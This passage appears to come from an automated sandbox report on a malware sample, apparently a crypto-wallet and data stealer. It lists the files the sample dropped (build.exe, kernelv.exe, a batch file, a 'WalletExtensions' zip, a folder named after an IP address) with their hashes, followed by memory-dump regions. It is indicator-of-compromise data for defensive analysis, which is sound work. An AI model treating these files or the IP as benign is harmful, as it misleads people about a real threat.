                        0d621b34b528494cd0c96d65986b09b6f3a94f74039ab4d024a2a8991c81b42b7eb45f1ae211165a2ff4dd2c8d8d8bd61d50f5e76407ea9e6e4c725577869355

                      • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Windows.txt

                        Filesize

                        73B

                        MD5

                        a26c3350726f46faeeffd63d436838cd

                        SHA1

                        9db9c0f5a9a357f75ea9492550ac8b9c4c2f3cf0

                        SHA256

                        e894a1be488101a63f16839475077e2b9ed0cdbe95b5a772f5f81dcd53403224

                        SHA512

                        aeb9f280d20422917554cfad6d10e6ee39bbb310fdc92d004c29ef59a62175021f89f8d32ecd0f7954858940c1ec945237c00150b21f1f7910546bbd73830bcf

                      • C:\Users\Admin\AppData\Local\Temp\6503.tmp\6504.tmp\6505.bat

                        Filesize

                        2KB

                        MD5

                        1c935ef28fdfd394b770d945d7f04d76

                        SHA1

                        29e251c3c40ce4ad1b2984bf26b444aa045d9b21

                        SHA256

                        aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

                        SHA512

                        a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

                      • C:\Users\Admin\AppData\Local\Temp\Extra.zip

                        Filesize

                        1KB

                        MD5

                        49b1cf0895f78b58f0511382e5c62b39

                        SHA1

                        46da3c70d23ec505f3b1cc6c8985e405b885d3b1

                        SHA256

                        f081df1edcae2f7ea1c9e36fc99fe91189802bfd7b4c2fc34331dedafbbf15e2

                        SHA512

                        a730f21ceb5723b5f29686a28a474276cbcfea94010d4e12a4a7c6d78b16cb390efe074054e0d98804283de62eebf02375806aa2d78fb6389658ef2988c7db15

                      • C:\Users\Admin\AppData\Local\Temp\WalletExtensions_2f25ac33-7552-4f71-b068-36f5a2cc6828.zip

                        Filesize

                        22B

                        MD5

                        76cdb2bad9582d23c1f6f4d868218d6c

                        SHA1

                        b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

                        SHA256

                        8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

                        SHA512

                        5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ov2tvwe1.hsb.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Local\Temp\build.exe

                        Filesize

                        137KB

                        MD5

                        7605fb5c749eeea0b1b27fdaad78051c

                        SHA1

                        28388bf016af085bbcbacf8c516853942f6ec8d3

                        SHA256

                        466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

                        SHA512

                        1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

                      • C:\Users\Admin\AppData\Local\Temp\kernelv.exe

                        Filesize

                        250KB

                        MD5

                        3252df0bec85cdcd3668d703ceaf09ce

                        SHA1

                        672366ae8df248c078db68a226d1fbf564d2f8ea

                        SHA256

                        02fa2665e5759db60b61da15b757150eda402ff6063a30a855a337d813fe8229

                        SHA512

                        179cab2e7d2cdc2cadc7a20986751007c10e6650069152df23d13bc1fef9fe5e066356f21825a325d34ea091c2b4e0766df1fabee8797da11a73de18dc46370f

                      • C:\Users\Admin\readme.txt

                        Filesize

                        780B

                        MD5

                        60d646f40556d78166ad8111d850fc51

                        SHA1

                        babaaf0762000dbf4b3f7a93beb35b6d9279d94d

                        SHA256

                        a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

                        SHA512

                        3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

                      • memory/3088-0-0x0000000140000000-0x0000000140027000-memory.dmp

                        Filesize

                        156KB

                      • memory/3088-65-0x0000000140000000-0x0000000140027000-memory.dmp

                        Filesize

                        156KB

                      • memory/3352-14-0x00007FF9852B0000-0x00007FF985D71000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3352-15-0x00007FF9852B0000-0x00007FF985D71000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/3352-13-0x0000013EE18C0000-0x0000013EE18E2000-memory.dmp

                        Filesize

                        136KB

                      • memory/3352-3-0x00007FF9852B3000-0x00007FF9852B5000-memory.dmp

                        Filesize

                        8KB

                      • memory/3352-18-0x00007FF9852B0000-0x00007FF985D71000-memory.dmp

                        Filesize

                        10.8MB

                      • memory/4312-47-0x0000000000C50000-0x0000000000C78000-memory.dmp

                        Filesize

                        160KB

                      • memory/5240-63-0x0000000004CE0000-0x0000000004EA2000-memory.dmp

                        Filesize

                        1.8MB

                      • memory/5240-62-0x0000000004AF0000-0x0000000004B02000-memory.dmp

                        Filesize

                        72KB

                      • memory/5240-68-0x0000000006730000-0x00000000067C2000-memory.dmp

                        Filesize

                        584KB

                      • memory/5240-61-0x00000000002A0000-0x00000000002E4000-memory.dmp

                        Filesize

                        272KB

                      • memory/5240-66-0x0000000005C60000-0x000000000618C000-memory.dmp

                        Filesize

                        5.2MB

                      • memory/5240-67-0x0000000005B70000-0x0000000005BD6000-memory.dmp

                        Filesize

                        408KB

                      • memory/5240-163-0x0000000007180000-0x0000000007724000-memory.dmp

                        Filesize

                        5.6MB